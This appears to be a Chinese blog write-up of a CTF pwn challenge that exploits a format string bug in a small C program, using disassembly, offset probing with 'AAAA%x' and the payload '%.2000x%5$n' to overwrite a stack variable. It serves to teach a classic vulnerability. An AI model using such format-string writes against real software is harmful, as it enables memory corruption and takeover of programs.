当前位置: 首页 > news >正文

某道Pwn(格式化字符串漏洞)

格式化字符串漏洞近几年出现频率少了,但是一些 CTF 中还有涉及,就当玩玩好了。

首先看这一段代码,什么比赛的题我忘了:

#include <stdio.h>
int main(void)
{ 
    int flag = 0;
    int *p = &flag; 
    char a[100];
    scanf("%s",a);
    printf(a);
    if(flag == 2000)
    {
        printf("good!!\n");
    }

    return 0;
}

目标是拿到Flag。我们使用GCC编译之后用ObjDump反编译:

 8048507:   c7 45 88 00 00 00 00    movl   $0x0,-0x78(%ebp) ;flag
 804850e:   8d 45 88                lea    -0x78(%ebp),%eax
 8048511:   89 45 8c                mov    %eax,-0x74(%ebp) ;p
 8048514:   83 ec 08                sub    $0x8,%esp
 8048517:   8d 45 90                lea    -0x70(%ebp),%eax ;a
 804851a:   50                      push   %eax
 804851b:   68 f0 85 04 08          push   $0x80485f0
 8048520:   e8 bb fe ff ff          call   80483e0 <__isoc99_scanf@plt>
 8048525:   83 c4 10                add    $0x10,%esp

我们可以看到pflag下面四个偏移,a又在p下面四个偏移,用缓冲区溢出是不可能了。下面有个printf,也许可以利用字符串格式化漏洞。

继续往下看汇编:

 8048528:   83 ec 0c                sub    $0xc,%esp
 804852b:   8d 45 90                lea    -0x70(%ebp),%eax
 804852e:   50                      push   %eax
 804852f:   e8 5c fe ff ff          call   8048390 <printf@plt>
 8048534:   83 c4 10                add    $0x10,%esp

我们可以看到printf总共接受了 4 个参数,实际上只有一个有效参数。

我们可以使用AAAA%x来寻找a的偏移:

wizard@ubuntu:~/Desktop$ ./t2
AAAA%x
AAAAffee9b78wizard@ubuntu:~/Desktop$ ./t2
AAAA%2$x
AAAAf767e329wizard@ubuntu:~/Desktop$ ./t2
AAAA%4$x
AAAA0wizard@ubuntu:~/Desktop$ ./t2
AAAA%5$x
AAAAfff44cd0wizard@ubuntu:~/Desktop$
AAAA%6$x
AAAA41414141 

我们看到了一个 0 ,又看到了一个很像地址的东西。然后就是我们输入的AAAA。我们于是可以断定,第四个%xflag,第五个%xp,第六个%xa的起始位置。

再试一下,发现栈基址是变化的:

wizard@ubuntu:~/Desktop$ ./t2
AAAA%5$x
AAAAffad7a70

也就是说,我们不能把f的地址写进a的前四个字节,但是我们可以利用p。构造字符串"%.2000%x%5$n"

ffe43b880wizard@ubuntu:~/Desktop$ ./t2
%.2000x%5$n
...
0000000000000000000000000000000000000ffce9f98good!!

成功。

相关文章:

  • 深入分析java web技术内幕----读书笔记(六)
  • 阻塞、非阻塞、同步、异步浅析
  • JqERY
  • BZOJ 4756 线段树合并(线段树)
  • 给自定义tabBar的按钮添加点击放大缩小的动画
  • idea 实现热部署
  • Advanced Auto Layout:Working with Self-Sizing Table View Cells
  • 震精 - PostgreSQL 单机3.9 万亿/天(计数器、序列、自增)
  • 什么是 SHTML
  • mysql57修改root密码
  • python3编码问题终结者--还搞不懂你来找我
  • Python(三)之Python的表达式和语句概述
  • # 20155222 2016-2017-2 《Java程序设计》第5周学习总结
  • 消息中间件简介
  • 画像分析(4-1)智能搬迁和数据订阅
  • [ 一起学React系列 -- 8 ] React中的文件上传
  • 【Under-the-hood-ReactJS-Part0】React源码解读
  • 11111111
  • Android开发 - 掌握ConstraintLayout(四)创建基本约束
  • Android开源项目规范总结
  • angular学习第一篇-----环境搭建
  • C++11: atomic 头文件
  • el-input获取焦点 input输入框为空时高亮 el-input值非法时
  • ES6系列(二)变量的解构赋值
  • ESLint简单操作
  • happypack两次报错的问题
  • JavaScript 奇技淫巧
  • JS数组方法汇总
  • React+TypeScript入门
  • Spring Cloud Feign的两种使用姿势
  • 成为一名优秀的Developer的书单
  • 基于axios的vue插件,让http请求更简单
  • 力扣(LeetCode)357
  • 排序(1):冒泡排序
  • 前端自动化解决方案
  • 使用 @font-face
  • 使用docker-compose进行多节点部署
  • 我与Jetbrains的这些年
  • LevelDB 入门 —— 全面了解 LevelDB 的功能特性
  • ​什么是bug?bug的源头在哪里?
  • # 手柄编程_北通阿修罗3动手评:一款兼具功能、操控性的电竞手柄
  • (1)SpringCloud 整合Python
  • (poj1.2.1)1970(筛选法模拟)
  • (二)pulsar安装在独立的docker中,python测试
  • (教学思路 C#之类三)方法参数类型(ref、out、parmas)
  • (南京观海微电子)——I3C协议介绍
  • (欧拉)openEuler系统添加网卡文件配置流程、(欧拉)openEuler系统手动配置ipv6地址流程、(欧拉)openEuler系统网络管理说明
  • (三)模仿学习-Action数据的模仿
  • (十)DDRC架构组成、效率Efficiency及功能实现
  • (算法)前K大的和
  • (一一四)第九章编程练习
  • (转)利用PHP的debug_backtrace函数,实现PHP文件权限管理、动态加载 【反射】...
  • ***linux下安装xampp,XAMPP目录结构(阿里云安装xampp)
  • .apk文件,IIS不支持下载解决
  • .dwp和.webpart的区别